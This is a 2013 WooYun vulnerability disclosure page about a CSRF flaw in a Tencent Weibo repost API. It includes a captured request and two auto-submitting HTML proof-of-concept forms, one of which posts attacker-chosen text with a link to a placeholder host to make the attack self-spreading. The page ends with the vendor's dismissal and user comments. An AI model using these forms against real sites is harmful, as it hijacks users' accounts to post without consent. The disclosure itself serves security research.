当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-022669

漏洞标题:腾讯微博某功能控制不严可导致蠕虫

相关厂商:腾讯

漏洞作者: se55i0n

提交时间:2013-04-28 11:23

修复时间:2013-04-28 15:38

公开时间:2013-04-28 15:38

漏洞类型:CSRF

危害等级:中

自评Rank:10

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-04-28: 细节已通知厂商并且等待厂商处理中
2013-04-28: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

哈哈,发个洞子祝tsrc的童鞋节日快乐!

详细说明:

1)今天看见腾讯微博又在打新的广告,就看了看;

6.png


2)看见可以转播,点击转播并抓包;

1.png


POST /641010080/weibo/t/re_add HTTP/1.1
Host: labs.api.act.qq.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:20.0) Gecko/20100101 Firefox/20.0
Accept: application/json, text/javascript, */*
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://labs.api.act.qq.com/apilibproxy.html
Content-Length: 657
Cookie: 
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
reid=272929023085220&content=%E8%8E%AB%E5%90%8D%E8%A2%AB%E6%88%B3%E4%B8%AD%E7%AC%91%E7%82%B9%EF%BC%8C%E4%B8%80%E8%B5%B7%E5%9B%B4%E8%A7%82%EF%BC%8C%E6%88%91%E4%BB%AC%E6%98%AF%E6%9D%A5%E8%87%AA%E5%90%8C%E4%B8%80%E6%AC%A1%E5%85%83%E7%9A%84%E4%BA%BA%E7%B1%BB%E4%B9%88%EF%BC%9F%EF%BC%81%E5%BD%93%E7%84%B6%E7%9C%8B%E7%9C%8B%E5%B0%B1%E5%A5%BD%EF%BC%8C%E5%88%AB%E5%A4%AA%E5%BD%93%E7%9C%9F%EF%BC%8C%E5%93%AA%E6%80%95%E4%B8%BA%E4%BA%86%E5%A5%96%E5%93%81%E7%82%B9%E5%87%BB%E8%BF%9B%E6%9D%A5%EF%BC%8C%E4%B9%9F%E8%AF%B7%E4%B8%8D%E8%A6%81%E8%AF%B4%E5%87%BA%E6%9D%A5%EF%BC%81+http%3A%2F%2Fe.t.qq.com%2Fzhiyaoquduoduo%3Ftab%3Dminisite%2526workid%3Dqdd2&qq=0&g_tk=1329581857


3)测试了下未校验referer,所以我们就能直接构造以下POC提交;

<html>
<body>
<form id="se55i0n" name="se55i0n" action="http://labs.api.act.qq.com/641010080/weibo/t/re_add" method="POST">
<input type="hidden" name="reid" value="272929023085220" />
<input type="hidden" name="content" value="%E8%8E%AB%E5%90%8D%E8%A2%AB%E6%88%B3%E4%B8%AD%E7%AC%91%E7%82%B9%EF%BC%8C%E4%B8%80%E8%B5%B7%E5%9B%B4%E8%A7%82%EF%BC%8C%E6%88%91%E4%BB%AC%E6%98%AF%E6%9D%A5%E8%87%AA%E5%90%8C%E4%B8%80%E6%AC%A1%E5%85%83%E7%9A%84%E4%BA%BA%E7%B1%BB%E4%B9%88%EF%BC%9F%EF%BC%81%E5%BD%93%E7%84%B6%E7%9C%8B%E7%9C%8B%E5%B0%B1%E5%A5%BD%EF%BC%8C%E5%88%AB%E5%A4%AA%E5%BD%93%E7%9C%9F%EF%BC%8C%E5%93%AA%E6%80%95%E4%B8%BA%E4%BA%86%E5%A5%96%E5%93%81%E7%82%B9%E5%87%BB%E8%BF%9B%E6%9D%A5%EF%BC%8C%E4%B9%9F%E8%AF%B7%E4%B8%8D%E8%A6%81%E8%AF%B4%E5%87%BA%E6%9D%A5%EF%BC%81+http%3A%2F%2Fe.t.qq.com%2Fzhiyaoquduoduo%3Ftab%3Dminisite%2526workid%3Dqdd2" />
<input type="hidden" name="qq" value="0" />
<input type="hidden" name="g_tk" value="1329581857">
<input type="submit" value="submit" />
</form>
<script>
   document.se55i0n.submit();
</script>
</body>
</html>


4)提交结果见下图;

2.png


5)返回主页刷新微博;

3.png


6)我们看到content的内容是可控的,那么我们运行以下的POC会是怎样的效果呢;

<html>
<body>
<form id="se55i0n" name="se55i0n" action="http://labs.api.act.qq.com/641010080/weibo/t/re_add" method="POST">
<input type="hidden" name="reid" value="272929023085220" />
<input type="hidden" name="content" value="this+is+a+csrf+test%21+http%3A%2F%2Fwww.xxx.com%2Fcsrf.html" />
<input type="hidden" name="qq" value="0" />
<input type="hidden" name="g_tk" value="1329581857">
<input type="submit" value="submit" />
</form>
<script>
   document.se55i0n.submit();
</script>
</body>
</html>


7)看效果吧;

5.png


PS:发的微博,测试完就已经删除!

漏洞证明:

见详细说明

修复方案:

你们懂的

版权声明:转载请注明来源 se55i0n@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2013-04-28 15:38

厂商回复:

感谢反馈,这里是使用token来防御CSRF的。

最新状态:

暂无

漏洞评价:

评论

  1. 2013-04-28 11:38 | 梧桐雨 认证白帽子 ( 核心白帽子 | Rank:1576 漏洞数:184 | 关注技术与网络安全)

    期待三哥多发洞,那样二哥就能猛进了。

  2. 2013-04-28 12:17 | 带馅儿馒头 ( 普通白帽子 | Rank:1278 漏洞数:143 | 心在,梦在)

    围观

  3. 2013-04-28 12:48 | 银冥币 ( 实习白帽子 | Rank:35 漏洞数:21 | "/upload/avatar/avatar_251_b.jpg" />)

    http://wooyun.org/bugs/wooyun-2013-022646/trace/2a75ca72903e5f390e66f8373ea8b4e5 @xsser

  4. 2013-04-28 13:06 | 小胖子 认证白帽子 ( 核心白帽子 | Rank:1727 漏洞数:140 | 如果大海能够带走我的矮丑...)

    骚年好久不见,你去哪里了?

  5. 2013-04-28 13:10 | koohik ( 普通白帽子 | Rank:542 漏洞数:63 | 没什么介绍的http://www.koohik.com/)

    @小胖子 骚年貌似去外地出差了,哈哈

  6. 2013-04-28 13:14 | se55i0n ( 普通白帽子 | Rank:1567 漏洞数:173 )

    @小胖子 @koohik 哎,出了趟差累个半死,,

  7. 2013-04-28 13:24 | 小胖胖要减肥 认证白帽子 ( 普通白帽子 | Rank:686 漏洞数:101 )

    @se55i0n 西藏了

  8. 2013-04-28 13:26 | se55i0n ( 普通白帽子 | Rank:1567 漏洞数:173 )

    @小胖胖要减肥 没,休息下,准备上了-_-"

  9. 2013-04-28 13:33 | 小胖胖要减肥 认证白帽子 ( 普通白帽子 | Rank:686 漏洞数:101 )

    @se55i0n 。。。。注意安全

  10. 2013-04-28 13:38 | se55i0n ( 普通白帽子 | Rank:1567 漏洞数:173 )

    @小胖胖要减肥 感动ing :D

  11. 2013-04-28 17:38 | 小胖胖要减肥 认证白帽子 ( 普通白帽子 | Rank:686 漏洞数:101 )

    @se55i0n g_tk=1329581857 token?

  12. 2013-04-28 17:47 | se55i0n ( 普通白帽子 | Rank:1567 漏洞数:173 )

    @小胖胖要减肥 我在面壁,QQ上找我,,,